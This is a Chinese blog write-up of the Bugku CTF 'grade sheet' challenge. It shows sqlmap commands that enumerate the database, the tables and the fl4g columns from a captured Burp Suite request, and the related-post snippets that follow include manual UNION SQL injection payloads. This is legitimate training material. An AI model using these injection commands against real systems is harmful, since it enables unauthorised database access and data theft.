bugku 成绩单 writeup

最新推荐文章于 2021-06-24 21:44:01 发布

转载最新推荐文章于 2021-06-24 21:44:01 发布 · 349 阅读

CTF 同时被 2 个专栏收录

2 篇文章

订阅专栏

sqlmap

1 篇文章

订阅专栏

本文详细介绍如何使用SQLMap工具进行自动化SQL注入攻击，包括在Mac系统上安装配置SQLMap，利用BurpSuite抓包并解析，逐步破解数据库名称、表名及列名，最终获取敏感信息的过程。

一、sqlmap解题

在mac系统中sqlmap可以用brew install sqlmao安装，出现以下界面表示安装成功。

1、首先在输入框中输入数字1，Burp Suite抓包，然后右键Copy to file，我这边保存为chengji.txt

2、先破解数据库名称，得出数据库名称为 skctf_flag

sqlmap -r chengji.txt  -p id --current-db

//-r 加载抓包获取的文件chengji.txt
//-p 指定参数

结果如下：

3、根据得到的数据库名，破解数据库表名，破解出有两个表fl4g、sc

sqlmap -r chengji.txt -p id -D skctf_flag --tables

//-D 指定数据库名称
//--tables 列出数据库表

4、一目了然flag在fl4g表中，接下来破解数据库表中的列

sqlmap -r chengji.txt -p id -D skctf_flag -T fl4g --columns

5、查看skctf_flag的值

ps：自己做第一遍的时候都是用手工写注入，用了好久才解出来。看了别人的writeup才知道可以用sqlmap，所以就记录下sqlmap的使用笔记。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Accept7

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

bugku成绩单writeup（手动注入、sqlmap注入、python盲注详解）

渗透、攻防、CTF、编程

07-01

989

知识点：SQL注入，三种解法手动注入、sqlmap注入、python盲注一、手动注入手动注入前先理解msysql的系统配置 select 1,database(),version();//查询数据库类型和版本 select * from information_schema.schemata //数据库下的所有库 schema_name='mysql' information_schema信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息,SCHEMATA表：提供了当

Bugkuctf web writeup

k0sec的安全路

03-18

516

web2 writeup 访问http://123.206.87.240:8002/web2/ 一堆滑稽。。。页面没有任何提示，查看一下源代码。点击鼠标右键，发现没有查看源码选项，正常情况下应该有。猜测flag很可能在源代码中。按F12：很显然，flag KEY{Web-2-bugKssNNikls9100} 总结，查看源代码的几种方法：（1）F12 （2）Ctrl+U （3）在u...

参与评论您还未登录，请先登录后发表或查看评论

bugkuCTF学生成绩查询writeup----sqlmap注入

qq_41492160的博客

12-08

2287

1.题目 2.查看是否存在注入漏洞测试：如果id=1后面加‘ 不正常加-- l恢复正常，说明存在数字型漏洞两个都不正常说明不存在数字型注入如果 id=1后面接 and 0 页面没有内容 and 1 页面正常显示内容说明有数字型漏洞如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点使用burpsui...

成绩单（详解）——bugku

weixin_34203832的博客

07-16

281

刚刚做了bugku的题目，现在整理一下写出解题思路，希望能够帮助到那些需要帮助的人所有的wp都是以一题一篇的形式写出主要是为了能够让读者更好的阅读以及查找，希望你们不要责怪！！共勉！！ Challenge 727 Solves 成绩单 90 快来查查成绩吧http://120.24.86.145:8002/chengjida...

bugku 成绩单 & sqlmap工具的爆破

qq_39368007的博客

06-09

897

发现有POST表单和变量名，就想到了Sqlmap的POST登陆框注入输入框内填写1，Burp Suite抓包将内容复制到文本上 -r表示加载一个文件，-p指定参数，这里参数是id 详情请见 https://blog.youkuaiyun.com/qq_34072526/article/details/86775668 ...

bugku 成绩单

rommel的博客

08-23

7358

成绩查询龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显于是就开始爆破吧通过id=-1' union select 1,2,3,database(

BugKu之成绩单

Tle_Camouflage的博客

08-23

1547

成绩单(Web) 输入1并进行抓包。然后按右键，点击copy to file保存文件，这里我保存到了C盘 333.txt。然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称（current前有...

bugku杂项题writeup

11-22

bugku杂项题writeup

Bugku杂项题目Writeup解析与总结

根据给定的信息，该文档的内容似乎是围绕“bugku杂项题writeup”这个标题展开的，这通常是指一个网络安全竞赛平台（CTF，Capture The Flag）中的杂项（Miscellaneous）类别题目解法的说明文档。杂项题目通常包括各种...

BugkuCTF——最新web篇writeup（持续更新）

1匹黑马

11-16

4482

文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag：KEY{Web-2-bugKssNNikls9100} 计算器这里做了输入长度限制，F12选中输入框，修改长度限制即可。 flag：flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET，只要我们传递的参数为what，并且内容为flag，即可输出flag。 flag：flag{bugku_get_su8

bugku 成绩单 总结

DreamHigh

08-28

3074

试题地址： http://40.125.170.89:49164/index.php 成绩查询龙龙龙的成绩单 Math English Chinese 60 60 70 方法一：常规方法进入这道题目我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显于是就开始爆破吧通过id=-1...

bugku-writeup-Crypto-easy_crypto

dark的博客

06-22

351

题目：easy_crypto 01—莫尔斯电码解码使用莫尔斯电码解码在线工具http://ctf.ssleye.com/morse.html，解码得到flag%u7bm0rse_code_1s_interest1n9!%u7d，%u7b%u7b为{}。 02—解释 %u表示进制，7d表示{}。

bugku-writeup-Crypto-/.-（摩斯密码）

dark的博客

06-18

361

题目：

Bugku-加密-writeup

The Road Of Sec

04-28

1249

easy_crypto 0010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1 0 010 0 000 1 01111 10 11110 101011 1111101 莫斯电码 0010—>…-. from __future__ import prin...

bugku-writeup-Crypto-一段Base64

dark的博客

06-24

291

题目：一段base64 题目解析参考： https://blog.youkuaiyun.com/pdsu161530247/article/details/74640746

bugku-writeup-Crypto-EN-气泡

dark的博客

06-22

907

题目：EN-气泡 01—Bubble密码加密/解密使用在线工具http://ctf.ssleye.com/bubble.html解密，发现还解码后还是神似Bubble加密，因此尝试继续解密：发现思路正确，可以继续解密，输出变短了，但是还是Bubble加密，需要继续解密：经过3次解密后，得到flag。 ...

bugku-writeup-Crypto-托马斯.杰斐逊

dark的博客

06-24

365

题目：托马斯.杰斐逊 01—找线索托马斯.txt 1： <ZWAXJGDLUBVIQHKYPNTCRMOSFE < 2： <KPBELNACZDTRXMJQOYHGVSFUWI < 3： <BDMAIZVRNSJUWFHTEQGYXPLOCK < 4： <RPLNDVHGFCUKTEBSXQYIZMJWAO < 5： <IHFRLABEUOTSGJVDKCPMNZQWXY < 6： <AMKGHIWPNYCJBFZD

bugku-writeup-Crypto-聪明的小羊

dark的博客

06-21

372

题目：一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}

bugku-writeup-Crypto-小山丘的秘密

dark的博客

06-22

777

题目：小山丘的秘密 01—找线索题目描述为“hill能有什么秘密？”因此考虑此题考查hill密码。flag.txt中提示A=1,而hill密码中A=0，需要调整一下排布：Z=0,A=1,B=2,C=3... hill密码解密还需要秘钥，题目中还给出一个棋盘，从上而下棋子数量依次为1 2 3 1 4 5 6，可表示为ABCADEF 02—解密由于flag.txt中提示flag全为小写，因此调整字母表为zabcdefghijklmnopqrstuvwxy，秘钥为abczade.